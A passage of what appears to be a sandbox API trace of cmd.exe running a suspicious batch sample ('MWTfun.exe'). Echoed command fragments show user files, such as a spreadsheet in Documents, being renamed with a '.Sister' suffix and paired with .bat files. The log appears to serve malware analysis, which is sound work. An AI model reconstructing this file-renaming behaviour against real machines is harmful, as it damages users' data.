lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0304.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.408] GetFileType (hFile=0x50) returned 0x2 [0304.408] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.408] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.408] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d57870*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d57870*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0304.409] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0304.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.409] GetFileType (hFile=0x50) returned 0x2 [0304.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.409] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0304.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.410] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0304.416] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0304.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.416] GetFileType (hFile=0x50) returned 0x2 [0304.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.416] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.417] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0304.422] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.422] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.422] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.422] malloc (_Size=0xffce) returned 0x21eda17ff00 [0304.423] ??_V@YAXPEAX@Z () returned 0x21eda17ff00 [0304.423] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.423] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.423] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.423] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.423] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.423] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.423] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.423] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.423] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.423] ??_V@YAXPEAX@Z () returned 0x1 [0304.423] GetProcessHeap () returned 0x21ed8c70000 [0304.423] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fbe0 [0304.423] GetProcessHeap () returned 0x21ed8c70000 [0304.423] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fbe0, Size=0x130) returned 0x21ed93b2330 [0304.423] GetProcessHeap () returned 0x21ed8c70000 [0304.423] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b2330) returned 0x130 [0304.423] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.424] malloc (_Size=0xffce) returned 0x21eda17ff00 [0304.424] ??_V@YAXPEAX@Z () returned 0x21eda17ff00 [0304.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.424] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda17ff00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0304.427] ??_V@YAXPEAX@Z () returned 0x1 [0304.427] GetProcessHeap () returned 0x21ed8c70000 [0304.427] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed93b2470 [0304.427] GetProcessHeap () returned 0x21ed8c70000 [0304.427] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d600a0 [0304.427] GetProcessHeap () returned 0x21ed8c70000 [0304.428] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d600a0, Size=0x130) returned 0x21ed93b12f0 [0304.428] GetProcessHeap () returned 0x21ed8c70000 [0304.428] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b12f0) returned 0x130 [0304.428] malloc (_Size=0xffce) returned 0x21eda17ff00 [0304.428] ??_V@YAXPEAX@Z () returned 0x21eda17ff00 [0304.428] GetProcessHeap () returned 0x21ed8c70000 [0304.428] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cb20 [0304.428] GetProcessHeap () returned 0x21ed8c70000 [0304.428] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937c360 [0304.428] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.428] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.428] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.428] GetLastError () returned 0x2 [0304.428] GetProcessHeap () returned 0x21ed8c70000 [0304.428] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d096a0 [0304.428] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d096b0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.429] SetErrorMode (uMode=0x0) returned 0x0 [0304.429] SetErrorMode (uMode=0x1) returned 0x0 [0304.429] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda17ff00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0304.429] SetErrorMode (uMode=0x0) returned 0x1 [0304.429] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0304.429] GetProcessHeap () returned 0x21ed8c70000 [0304.429] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937de30 [0304.429] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.429] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.429] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.429] GetLastError () returned 0x2 [0304.429] ??_V@YAXPEAX@Z () returned 0x1 [0304.429] malloc (_Size=0xffce) returned 0x21eda17ff00 [0304.429] ??_V@YAXPEAX@Z () returned 0x21eda17ff00 [0304.429] malloc (_Size=0xffce) returned 0x21eda18fee0 [0304.430] ??_V@YAXPEAX@Z () returned 0x21eda18fee0 [0304.430] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.430] GetLastError () returned 0x2 [0304.430] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.430] GetFileType (hFile=0x54) returned 0x2 [0304.430] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0304.430] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0304.431] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.431] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0304.431] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.431] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.431] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0304.437] longjmp () [0304.437] ??_V@YAXPEAX@Z () returned 0x1 [0304.437] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88e295a0, ftCreationTime.dwHighDateTime=0x1d585c5, ftLastAccessTime.dwLowDateTime=0x6268600, ftLastAccessTime.dwHighDateTime=0x1d5b147, ftLastWriteTime.dwLowDateTime=0x6268600, ftLastWriteTime.dwHighDateTime=0x1d5b147, nFileSizeHigh=0x0, nFileSizeLow=0x5337, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="H9s7Hw-GdZ3UkH71Zv7J.xlsx", cAlternateFileName="")) returned 1 [0304.437] GetProcessHeap () returned 0x21ed8c70000 [0304.437] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95c40, Size=0x112) returned 0x21ed8c758a0 [0304.438] GetProcessHeap () returned 0x21ed8c70000 [0304.438] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x112 [0304.438] GetProcessHeap () returned 0x21ed8c70000 [0304.438] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d57d40 [0304.438] GetProcessHeap () returned 0x21ed8c70000 [0304.438] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d57d40, Size=0x30) returned 0x21ed8d57d40 [0304.438] GetProcessHeap () returned 0x21ed8c70000 [0304.438] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57d40) returned 0x30 [0304.438] GetProcessHeap () returned 0x21ed8c70000 [0304.438] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d57d80 [0304.438] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.438] GetProcessHeap () returned 0x21ed8c70000 [0304.438] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7be90 [0304.438] ??_V@YAXPEAX@Z () returned 0x1 [0304.438] GetProcessHeap () returned 0x21ed8c70000 [0304.438] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d57d80, Size=0x210) returned 0x21ed8d57d80 [0304.438] GetProcessHeap () returned 0x21ed8c70000 [0304.438] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57d80) returned 0x210 [0304.439] GetProcessHeap () returned 0x21ed8c70000 [0304.439] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d57fa0 [0304.439] GetProcessHeap () returned 0x21ed8c70000 [0304.439] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d57fa0, Size=0x290) returned 0x21ed8d57fa0 [0304.439] GetProcessHeap () returned 0x21ed8c70000 [0304.439] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57fa0) returned 0x290 [0304.439] GetProcessHeap () returned 0x21ed8c70000 [0304.439] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58240 [0304.439] GetProcessHeap () returned 0x21ed8c70000 [0304.439] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58240, Size=0x30) returned 0x21ed8d58240 [0304.439] GetProcessHeap () returned 0x21ed8c70000 [0304.439] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58240) returned 0x30 [0304.439] GetProcessHeap () returned 0x21ed8c70000 [0304.439] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58280 [0304.439] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.439] GetProcessHeap () returned 0x21ed8c70000 [0304.439] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7bad0 [0304.439] ??_V@YAXPEAX@Z () returned 0x1 [0304.439] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.439] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0xf, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cb80 [0304.440] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0304.440] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0xf, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb80 [0304.440] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0304.440] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe00a157c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe00a157c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0xf, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7cb80 [0304.440] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0304.441] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0304.441] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\H9s7Hw-GdZ3UkH71Zv7J.xlsx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88e295a0, ftCreationTime.dwHighDateTime=0x1d585c5, ftLastAccessTime.dwLowDateTime=0x6268600, ftLastAccessTime.dwHighDateTime=0x1d5b147, ftLastWriteTime.dwLowDateTime=0x6268600, ftLastWriteTime.dwHighDateTime=0x1d5b147, nFileSizeHigh=0x0, nFileSizeLow=0x5337, dwReserved0=0x4, dwReserved1=0xf, cFileName="H9s7Hw-GdZ3UkH71Zv7J.xlsx", cAlternateFileName="H9S7HW~1.XLS")) returned 0x21ed8c7cb80 [0304.441] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0304.441] _wcsnicmp (_String1="H9S7HW~1.XLS", _String2="H9s7Hw-GdZ3UkH71Zv7J.xlsx", _MaxCount=0x19) returned 81 [0304.441] malloc (_Size=0x1ff9c) returned 0x21eda19fec0 [0304.442] ??_V@YAXPEAX@Z () returned 0x21eda19fec0 [0304.443] GetProcessHeap () returned 0x21ed8c70000 [0304.443] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bd50 [0304.443] ??_V@YAXPEAX@Z () returned 0x1 [0304.443] ??_V@YAXPEAX@Z () returned 0x1 [0304.443] GetProcessHeap () returned 0x21ed8c70000 [0304.443] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58280, Size=0x208) returned 0x21ed8d58280 [0304.443] GetProcessHeap () returned 0x21ed8c70000 [0304.443] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58280) returned 0x208 [0304.443] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0304.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.443] GetFileType (hFile=0x50) returned 0x2 [0304.443] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.443] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0304.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.444] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0304.454] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.454] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.454] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0304.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.454] GetFileType (hFile=0x50) returned 0x2 [0304.454] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.454] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0304.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.455] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0304.455] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.455] GetFileType (hFile=0x50) returned 0x2 [0304.455] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.455] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.457] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d57d50*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d57d50*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.457] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"H9s7Hw-GdZ3UkH71Zv7J.xlsx\" \"H9s7Hw-GdZ3UkH71Zv7J.xlsx.Sister\" ") returned 64 [0304.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.457] GetFileType (hFile=0x50) returned 0x2 [0304.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.457] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.458] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x40) returned 1 [0304.458] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0304.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.458] GetFileType (hFile=0x50) returned 0x2 [0304.458] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.459] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.459] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.459] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.460] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0304.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.460] GetFileType (hFile=0x50) returned 0x2 [0304.460] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.460] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.460] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0304.461] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0304.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.461] GetFileType (hFile=0x50) returned 0x2 [0304.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.461] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.461] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0304.463] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0304.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.463] GetFileType (hFile=0x50) returned 0x2 [0304.463] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.463] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.463] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0304.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.469] GetFileType (hFile=0x50) returned 0x2 [0304.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.469] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.469] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d58250*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d58250*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.470] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"H9s7Hw-GdZ3UkH71Zv7J.xlsx.Sister\" \"H9s7Hw-GdZ3UkH71Zv7J.bat\" ") returned 63 [0304.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.470] GetFileType (hFile=0x50) returned 0x2 [0304.470] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.470] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.471] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3f) returned 1 [0304.478] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: 